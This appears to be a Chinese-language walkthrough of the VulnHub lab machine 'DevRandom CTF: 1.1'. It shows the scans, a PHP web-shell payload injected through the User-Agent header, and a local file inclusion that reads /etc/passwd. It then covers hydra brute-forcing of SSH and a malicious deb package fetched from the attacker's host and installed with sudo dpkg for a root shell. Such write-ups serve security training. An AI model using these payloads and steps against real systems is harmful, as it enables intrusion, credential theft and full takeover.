DevRandom CTF: 1.1
靶机信息
名称:DevRandom CTF: 1.1
地址:
https://www.vulnhub.com/entry/devrandom-ctf-11,450/
识别目标主机IP地址
─(kali㉿kali)-[~/Vulnhub/DevRandom]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:03 1 60 Unknown vendor
192.168.56.100 08:00:27:9c:b2:21 1 60 PCS Systemtechnik GmbH
192.168.56.254 08:00:27:ef:c4:95 1 60 PCS Systemtechnik GmbH
利用Kali Linux内置的netdiscover工具识别目标主机IP地址为192.168.56.254
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/DevRandom]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-27 04:13 EDT
Nmap scan report for driftingblues.box (192.168.56.254)
Host is up (0.00012s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 83e5a151b1f698d319e75910f7f4e85e (RSA)
| 256 b2a679c3ad2fbacc02b3420da2a39e60 (ECDSA)
|_ 256 ec1fd4299fa5aeca93f4a86bfd614445 (ED25519)
80/tcp open http Apache httpd
| http-robots.txt: 3 disallowed entries
|_/wp-admin/ /wp-login.php /?include=info
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache
MAC Address: 08:00:27:EF:C4:95 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NMAP扫描结果表明目标主机有2个开放端口:22(ssh),80(http)
获得Shell
┌──(kali㉿kali)-[~/Vulnhub/DevRandom]
└─$ curl http://192.168.56.254/robots.txt
User-agent: *
Disallow: /wp-admin/
Disallow: /wp-login.php
Disallow: /?include=info
但是访问/wp-admin/,/wp-login.php,返回的页面内容并非正常wordpress
访问:
http://192.168.56.254/?include=info
访问该地址时,从页面源代码得知CMS是wordpress,但是主机地址却配置有问题,因为该方向的分析没有价值。
ing: 0 !important;
}
</style>
<link rel='stylesheet' id='wp-block-library-css' href='http://192.168.1.214/wp-includes/css/dist/block-library/style.min.css?ver=5.3.2' media='all' />
<link rel='stylesheet' id='twentytwenty-style-css' href='http://192.168.1.214/wp-content/themes/twentytwenty/style.css?ver=1.1' media='all' />
──(kali㉿kali)-[~/Vulnhub/DevRandom]
└─$ nikto -h http://192.168.56.254
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.56.254
+ Target Hostname: 192.168.56.254
+ Target Port: 80
+ Start Time: 2023-05-27 04:17:39 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /robots.txt: Entry '/wp-login.php' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ RFC-1918 /?include=info/: IP address found in the 'link' header. The IP is "192.168.1.214". See: https://portswigger.net/kb/issues/00600300_private-ip-addresses-disclosed
+ /robots.txt: Entry '/?include=info/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/wp-admin/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: contains 3 entries which should be manually viewed. See: https://developer.mozilla.org/en-US/docs/Glossary/Robots.txt
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /secret/: Directory indexing found.
+ /secret/: This might be interesting.
nikto工具发现了/secret目录,访问该目录得到3个文件,其中一个文件大小为0,可不予考虑:
──(kali㉿kali)-[~/Vulnhub/DevRandom]
└─$ curl http://192.168.56.254/secret/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /secret</title>
</head>
<body>
<h1>Index of /secret</h1>
<table>
<tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
<tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/">Parent Directory</a></td><td> </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="arizona">arizona</a></td><td align="right">2020-03-19 16:52 </td><td align="right"> 42 </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="nucleus">nucleus</a></td><td align="right">2020-03-19 16:51 </td><td align="right"> 0 </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="wrap">wrap</a></td><td align="right">2020-03-22 08:37 </td><td align="right">6.4K</td><td> </td></tr>
<tr><th colspan="5"><hr></th></tr>
</table>
</body></html>
┌──(kali㉿kali)-[~/Vulnhub/DevRandom]
└─$ curl http://192.168.56.254/secret/arizona
API:4395874598yt3r9iy98r7r90t87treterrrrr
┌──(kali㉿kali)-[~/Vulnhub/DevRandom]
└─$ curl http://192.168.56.254/secret/wrap
<p> john:Password123
wrap文件中有用户名和密码,但是尝试发现并不能登录ssh
┌──(kali㉿kali)-[~/Vulnhub/DevRandom]
└─$ ssh john@192.168.56.254
The authenticity of host '192.168.56.254 (192.168.56.254)' can't be established.
ED25519 key fingerprint is SHA256:AnG5VJ89V2BLxl3FruwQRAYjvRcsk/DSGj3zNJrfMyY.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:1: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.254' (ED25519) to the list of known hosts.
john@192.168.56.254's password:
Permission denied, please try again.
这也许是个陷阱。
┌──(kali㉿kali)-[~/Vulnhub/DevRandom]
└─$ gobuster dir -u http://192.168.56.254 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.sh,.js
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.254
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Extensions: php,txt,html,sh,js
[+] Timeout: 10s
===============================================================
2023/05/27 04:21:35 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 199]
/.html (Status: 403) [Size: 199]
/index.php (Status: 200) [Size: 74]
/wp-content (Status: 301) [Size: 241] [--> http://192.168.56.254/wp-content/]
/wp-login.php (Status: 200) [Size: 74]
/license.txt (Status: 200) [Size: 19935]
/wp-includes (Status: 301) [Size: 242] [--> http://192.168.56.254/wp-includes/]
/log.php (Status: 200) [Size: 2324657]
/readme.html (Status: 200) [Size: 7368]
/robots.txt (Status: 200) [Size: 86]
/wp-trackback.php (Status: 200) [Size: 74]
/secret (Status: 301) [Size: 237] [--> http://192.168.56.254/secret/]
/secret.php (Status: 200) [Size: 38]
Gobuster工具扫描出文件/log.php
从页面内容可知:view acces.log file : /var/www/html/access.log
该日志文件记录web访问日志,因此可以通过在请求头中插入php代码实现shell的获取
可以用burpsuite拦截请求
在user-agent字段中替换为
<?php system($_GET["cmd"]); ?>
但是此时再访问/log.php,发现返回 的内容仅仅是:view acces.log file : /var/www/html/access.log
还是回到robots.txt中
http://192.168.56.254/?include=info
这里应该存在本地文件包含漏洞,但是注意可能当前文件所在的位置较深,因此需要多层../
┌──(kali㉿kali)-[~/Vulnhub/DevRandom]
└─$ curl http://192.168.56.254/?include=../../../../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
_apt:x:103:65534::/nonexistent:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
john:x:1000:1000:john,,,:/home/john:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
lisa:x:1001:1001:,,,:/home/lisa:/bin/bash
henri:x:1002:1002:,,,:/home/henri:/bin/bash
mysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/false
proftpd:x:107:65534::/run/proftpd:/usr/sbin/nologin
ftp:x:108:65534::/srv/ftp:/usr/sbin/nologin
wordpressftp:x:1003:1003:,,,:/var/www/html:/bin/rbash
victor:x:1004:1004:,,,:/home/victor:/bin/bash
trevor:x:1005:1005:,,,:/home/trevor:/bin/bash
──(kali㉿kali)-[~/Vulnhub/DevRandom]
└─$ cat user.dict
trevor
victor
john
lisa
henri
┌──(kali㉿kali)-[~/Vulnhub/DevRandom]
└─$ hydra -l trevor -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.254
尝试破解每个用户的密码,得到trevor的密码qwertyuiop[],如果用rockyou.txt会用比较长的时间来破解
┌──(kali㉿kali)-[~/Vulnhub/DevRandom]
└─$ ssh trevor@192.168.56.254
trevor@192.168.56.254's password:
Linux lucifer 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1 (2020-01-26) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Mar 23 17:54:37 2020
trevor@lucifer:~$ ls -alh
total 28K
drwxr-x--- 4 trevor trevor 4.0K Mar 25 2020 .
drwxr-xr-x 7 root root 4.0K Mar 23 2020 ..
-rw-r--r-- 1 trevor trevor 220 Mar 23 2020 .bash_logout
-rw-r--r-- 1 trevor trevor 3.5K Mar 23 2020 .bashrc
drwx------ 3 trevor trevor 4.0K Mar 23 2020 .gnupg
drwxr-xr-x 3 trevor trevor 4.0K Mar 23 2020 .local
-rw-r--r-- 1 trevor trevor 807 Mar 23 2020 .profile
trevor@lucifer:~$ sudo -l
Matching Defaults entries for trevor on lucifer:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User trevor may run the following commands on lucifer:
(root) NOPASSWD: /usr/bin/dpkg
提权
安装fpm
┌──(kali㉿kali)-[~/Vulnhub/DevRandom]
└─$ sudo gem install fpm
根据GTFOBINS步骤创建deb包
┌──(kali㉿kali)-[~/Vulnhub/DevRandom]
└─$ TF=$(mktemp -d)
┌──(kali㉿kali)-[~/Vulnhub/DevRandom]
└─$ echo 'exec /bin/sh' > $TF/x.sh
┌──(kali㉿kali)-[~/Vulnhub/DevRandom]
└─$ fpm -n x -s dir -t deb -a all --before-install $TF/x.sh $TF
Created package {:path=>"x_1.0_all.deb"}
将上述deb上传到目标主机/tmp目录
trevor@lucifer:/tmp$ wget http://192.168.56.253:8000/x_1.0_all.deb
--2023-05-27 04:38:20-- http://192.168.56.253:8000/x_1.0_all.deb
Connecting to 192.168.56.253:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1092 (1.1K) [application/vnd.debian.binary-package]
Saving to: ‘x_1.0_all.deb’
x_1.0_all.deb 100%[============================================================================>] 1.07K --.-KB/s in 0s
2023-05-27 04:38:20 (37.1 MB/s) - ‘x_1.0_all.deb’ saved [1092/1092]
trevor@lucifer:/tmp$ sudo dpkg -i x_1.0_all.deb
Selecting previously unselected package x.
(Reading database ... 40777 files and directories currently installed.)
Preparing to unpack x_1.0_all.deb ...
# cd /root
# ls -alh
total 40K
drwx------ 4 root root 4.0K May 27 04:30 .
drwxr-xr-x 22 root root 4.0K Mar 19 2020 ..
-rw------- 1 root root 573 Mar 26 2020 .bash_history
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
-rw-r--r-- 1 root root 89 Mar 22 2020 flag.txt
drwx------ 3 root root 4.0K Mar 20 2020 .gnupg
-rw------- 1 root root 36 May 27 04:30 .lesshst
drwxr-xr-x 3 root root 4.0K Mar 19 2020 .local
-rw------- 1 root root 513 Mar 18 2020 .mysql_history
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
# cat flag.txt
WELl DONE
echo "THISISTHEFLAGTHISISTHEFLAG\!\!\!\@\@\@###" | base64 > thisistheflag.txt
#